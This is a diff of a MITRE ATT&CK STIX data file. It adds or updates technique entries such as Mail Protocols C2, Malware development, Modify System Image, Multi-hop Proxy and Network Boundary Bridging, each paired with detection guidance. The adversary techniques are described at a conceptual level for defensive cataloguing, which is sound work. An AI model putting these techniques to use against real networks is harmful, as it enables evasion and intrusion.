\n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "name": "Mail Protocols", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -16065,6 +18492,15 @@ "source_name": "University of Birmingham C2" } ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "modified": "2020-10-21T16:35:45.633Z", + "created": "2020-03-15T16:21:45.131Z", "x_mitre_platforms": [ "Linux", "macOS", @@ -16221,6 +18657,93 @@ "x_mitre_is_subtechnique": true, "x_mitre_version": "1.0" }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1587.001", + "url": "https://attack.mitre.org/techniques/T1587/001" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "ActiveMalwareEnergy", + "description": "Dan Goodin. (2014, June 30). Active malware operation let attackers sabotage US energy industry. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/" + }, + { + "source_name": "FBI Flash FIN7 USB", + "url": "https://www.losangeles.va.gov/documents/MI-000120-MW.pdf", + "description": "Federal Bureau of Investigation, Cyber Division. (2020, March 26). FIN7 Cyber Actors Targeting US Businesses Through USB Keystroke Injection Attacks. Retrieved October 14, 2020." + }, + { + "source_name": "FireEye APT29", + "description": "FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Malware", + "description": "Before compromising a victim, adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors, packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)", + "id": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T13:05:43.492Z", + "created": "2020-10-01T01:33:01.433Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588.001", + "url": "https://attack.mitre.org/techniques/T1588/001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Malware", + "description": "Before compromising a victim, adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).", + "id": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-15T20:46:54.437Z", + "created": "2020-10-01T02:06:11.499Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" @@ -16321,7 +18844,7 @@ "phase_name": "collection" } ], - "modified": "2020-03-31T13:54:08.535Z", + "modified": "2020-10-16T15:19:48.733Z", "created": "2020-02-11T19:07:12.114Z", "x_mitre_contributors": [ "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project" @@ -16335,7 +18858,7 @@ "x_mitre_permissions_required": [ "User" ], - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ "Windows", @@ -16574,7 +19097,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-07-13T21:23:01.762Z", + "modified": "2020-10-21T02:41:11.743Z", "created": "2020-02-11T19:01:56.887Z", "x_mitre_data_sources": [ "File monitoring", @@ -16585,12 +19108,13 @@ "DLL monitoring" ], "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference. \n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)\n\nMonitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ "Windows", "Linux", - "macOS" + "macOS", + "Network" ] }, { @@ -16603,7 +19127,7 @@ { "source_name": "Mandiant M-Trends 2020", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." } ], "object_marking_refs": [ @@ -16620,7 +19144,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-19T14:46:00.117Z", + "modified": "2020-09-14T19:55:23.798Z", "created": "2019-08-30T18:03:05.864Z", "x_mitre_detection": "Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", "x_mitre_data_sources": [ @@ -16737,7 +19261,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-03-29T22:52:55.930Z", + "modified": "2020-08-13T20:02:49.641Z", "created": "2017-05-31T21:31:23.587Z", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ @@ -16748,7 +19272,7 @@ "Administrator", "SYSTEM" ], - "x_mitre_detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).", + "x_mitre_detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).", "x_mitre_defense_bypassed": [ "Host forensic analysis" ], @@ -16764,7 +19288,56 @@ "Travis Smith, Tripwire", "David Lu, Tripwire" ], - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1601", + "url": "https://attack.mitre.org/techniques/T1601" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Modify System Image", + "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.", + "id": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-10-22T17:50:47.635Z", + "created": "2020-10-19T19:42:19.740Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_detection": "Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. \n\nCompare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "x_mitre_data_sources": [ + "Network device run-time memory", + "Network device configuration", + "File monitoring" + ], + "x_mitre_platforms": [ + "Network" + ] }, { "id": "attack-pattern--a127c32c-cbb0-4f9d-be07-881a792408ec", @@ -17028,6 +19601,11 @@ "source_name": "mitre-attack", "external_id": "T1090.003", "url": "https://attack.mitre.org/techniques/T1090/003" + }, + { + "source_name": "Onion Routing", + "url": "https://en.wikipedia.org/wiki/Onion_routing", + "description": "Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020." } ], "object_marking_refs": [ @@ -17035,7 +19613,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Multi-hop Proxy", - "description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.", + "description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)\n\nIn the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization\u2019s WAN. Protocols such as ICMP may be used as a transport.", "id": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "type": "attack-pattern", "kill_chain_phases": [ @@ -17044,19 +19622,21 @@ "phase_name": "command-and-control" } ], - "modified": "2020-03-14T23:23:41.770Z", + "modified": "2020-10-21T17:54:28.280Z", "created": "2020-03-14T23:23:41.770Z", - "x_mitre_version": "1.0", + "x_mitre_version": "2.0", "x_mitre_is_subtechnique": true, - "x_mitre_detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.", + "x_mitre_detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.\n\nIn context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers. Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted. Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.", "x_mitre_data_sources": [ + "Packet capture", "Network protocol analysis", "Netflow/Enclave netflow" ], "x_mitre_platforms": [ "Linux", "macOS", - "Windows" + "Windows", + "Network" ] }, { @@ -17351,10 +19931,18 @@ ] }, { - "id": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Native API", - "description": "Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.", + "created": "2017-05-31T21:31:17.472Z", + "modified": "2020-07-01T16:19:54.646Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "type": "attack-pattern", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -17417,39 +20005,31 @@ "description": "Apple. (n.d.). Foundation. Retrieved July 1, 2020." } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "description": "Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.", + "name": "Native API", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "x_mitre_is_subtechnique": false, + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "Stefan Kanthak" ], - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "execution" - } - ], - "modified": "2020-07-01T16:19:54.646Z", - "created": "2017-05-31T21:31:17.472Z", - "x_mitre_platforms": [ - "Windows", - "macOS", - "Linux" - ], - "x_mitre_remote_support": false, - "x_mitre_permissions_required": [ - "User" - ], - "x_mitre_detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ", "x_mitre_data_sources": [ "System calls", "Loaded DLLs", "API monitoring", "Process monitoring" ], - "x_mitre_contributors": [ - "Stefan Kanthak" + "x_mitre_detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ", + "x_mitre_permissions_required": [ + "User" ], - "x_mitre_version": "2.0", - "x_mitre_is_subtechnique": false + "x_mitre_remote_support": false, + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ] }, { "id": "attack-pattern--bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2", @@ -17544,6 +20124,91 @@ "Windows" ] }, + { + "created": "2020-10-19T16:48:08.241Z", + "modified": "2020-10-21T01:45:58.951Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "description": "Adversaries may bridge network boundaries by modifying a network device\u2019s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities", + "name": "Network Address Translation Traversal", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1599.001", + "url": "https://attack.mitre.org/techniques/T1599/001" + }, + { + "source_name": "RFC1918", + "url": "https://tools.ietf.org/html/rfc1918", + "description": "IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020." + } + ], + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_data_sources": [ + "Netflow/Enclave netflow", + "Packet capture" + ], + "x_mitre_detection": "Consider monitoring network traffic on both interfaces of border network devices. Compare packets transmitted by the device between networks to look for signs of NAT being implemented. Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3. In some cases, Port Address Translation (PAT) may also be used by an adversary.\n\nMonitor the border network device\u2019s configuration to determine if any unintended NAT rules have been added without authorization.", + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" + }, + { + "created": "2020-10-19T16:08:29.817Z", + "modified": "2020-10-21T01:45:59.246Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "description": "Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.", + "name": "Network Boundary Bridging", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1599", + "url": "https://attack.mitre.org/techniques/T1599" + } + ], + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_data_sources": [ + "Netflow/Enclave netflow", + "Packet capture" + ], + "x_mitre_detection": "Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question. Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.\n\nMonitor the border network device\u2019s configuration to validate that the policy enforcement sections are what was intended. Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.", + "x_mitre_defense_bypassed": [ + "Router ACL", + "Firewall" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_version": "1.0" + }, { "external_references": [ { @@ -17586,7 +20251,7 @@ "phase_name": "impact" } ], - "modified": "2020-03-29T01:11:28.903Z", + "modified": "2020-09-16T15:58:18.788Z", "created": "2019-04-17T20:23:15.105Z", "x_mitre_is_subtechnique": false, "x_mitre_detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", @@ -17613,6 +20278,167 @@ "Office 365" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1556.004", + "url": "https://attack.mitre.org/techniques/T1556/004" + }, + { + "source_name": "FireEye - Synful Knock", + "url": "https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html", + "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - 